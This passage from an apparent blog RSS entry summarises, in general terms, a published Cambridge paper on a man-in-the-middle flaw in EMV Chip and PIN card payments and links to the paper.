payments worldwide, with over 730 million cards in circulation.<br />
Known to bank customers as “Chip and PIN”, it is used in<br />
Europe; it is being introduced in Canada; and there is pressure<br />
from banks to introduce it in the USA too. EMV secures<br />
credit and debit card transactions by authenticating both the<br />
card and the customer presenting it through a combination of<br />
cryptographic authentication codes, digital signatures, and the<br />
entry of a PIN. In the following paper  that describe and demonstrate a<br />
protocol flaw which allows criminals to use a genuine card<br />
to make a payment without knowing the card’s PIN, and<br />
to remain undetected even when the merchant has an online<br />
connection to the banking network. The fraudster performs a<br />
man-in-the-middle attack to trick the terminal into believing<br />
the PIN verified correctly, while telling the issuing bank that<br />
no PIN was entered at all.</p>
</div>
<div class="mceTemp"><a class="alignleft" title="Research Paper from Cambridge.UK" href="http://www.cl.cam.ac.uk/research/security/banking/nopin/oakland10chipbroken.pdf" target="_blank">Research Paper from Cambridge .UK</a></div>
<div class="mceTemp">
<div><a href="http://www.cl.cam.ac.uk/research/security/banking/nopin/oakland10chipbroken.pdf"></a></div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://rootkit.tw/blog/?feed=rss2&amp;p=26</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
